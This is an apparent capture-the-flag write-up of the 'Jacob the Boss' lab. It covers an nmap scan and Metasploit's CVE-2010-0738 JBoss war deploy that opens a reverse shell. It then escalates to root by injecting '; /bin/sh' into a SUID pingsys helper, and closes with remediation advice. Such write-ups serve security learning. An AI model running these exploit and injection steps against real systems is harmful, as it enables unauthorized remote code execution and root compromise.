Case file

JBoss CVE-2010-0738 deploy and SUID pingsys injection

Intermediate Java middleware engagement: unauthenticated JBoss JMX console (CVE-2010-0738) accepted a Metasploit war deploy for a service shell; SUID pingsys command injection completed root.

Intermediate26 minLinux · JBoss · Metasploit · Privilege Escalation
  • CentOS host exposed JBoss on 8080 with an unauthenticated jmx-console. Metasploit deployed a war for a reverse shell; a misplaced SUID helper finished root via shell metacharacters.

  • Versioned vuln scan highlighted JBoss on 8080 and confirmed CVE-2010-0738 class exposure on jmx-console.

  • Metasploit jboss_deploymentfilerepository deployed a reverse shell without credentials.

  • find for SUID binaries returned /usr/bin/pingsys. Injected /bin/sh after a semicolon as root.

01

Engagement summary

CentOS host exposed JBoss on 8080 with an unauthenticated jmx-console. Metasploit deployed a war for a reverse shell; a misplaced SUID helper finished root via shell metacharacters.

Host JACOB THE BOSS (10.48.179.33 / jacobtheboss.box) presented Apache on 80 and a full JBoss stack on 8080 including /jmx-console/ and /invoker/JMXInvokerServlet. Nmap’s http-vuln-cve2010-0738 script confirmed authentication was not required. We used exploit/multi/http/jboss_deploymentfilerepository to deploy a payload and catch a reverse shell as the application user under /home/jacob. Local enumeration found SUID /usr/bin/pingsys, which passed attacker-controlled arguments into a shell — `pingsys '127.0.0.1; /bin/sh'` returned root.

Business impact

Unauthenticated JBoss management surfaces are remote code execution on the application tier. SUID wrappers that concatenate user input into system() recreate classic command injection as root. Patch or remove legacy JBoss, require authentication on JMX, and rewrite or remove unsafe SUID helpers.

02

Service discovery and CVE pin

Versioned vuln scan highlighted JBoss on 8080 and confirmed CVE-2010-0738 class exposure on jmx-console.

OPERATOR · NMAP

savvy@lab:~$ echo '10.48.179.33 jacobtheboss.box' | sudo tee -a /etc/hosts

savvy@lab:~$ nmap -sV --script=vuln 10.48.179.33

8080/tcp open http Apache Tomcat/Coyote JSP engine

| http-vuln-cve2010-0738: /jmx-console/: Authentication was not required

1099/tcp open java-rmi Java RMI Registry

03

JBoss war deploy RCE

Metasploit jboss_deploymentfilerepository deployed a reverse shell without credentials.

OPERATOR · MSF

savvy@lab:~$ msfconsole -q

msf6 > search CVE 2010-0738

msf6 > use exploit/multi/http/jboss_deploymentfilerepository

msf6 > set RHOSTS 10.48.179.33

msf6 > set LHOST tun0

msf6 > run

Command shell session opened

savvy@lab:~$ python -c 'import pty;pty.spawn("/bin/bash")'

savvy@lab:~$ id

uid=... gid=... groups=...

04

SUID pingsys command injection

find for SUID binaries returned /usr/bin/pingsys. Injected /bin/sh after a semicolon as root.

OPERATOR · SUID

savvy@lab:~$ find / -perm /4000 -type f 2>/dev/null

/usr/bin/pingsys

savvy@lab:~$ /usr/bin/pingsys '127.0.0.1; /bin/sh'

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Upgrade or decommission unpatched JBoss AS; never expose jmx-console without auth and network controls. Remove SUID from diagnostic wrappers; if retention is required, validate arguments and avoid shell invocation.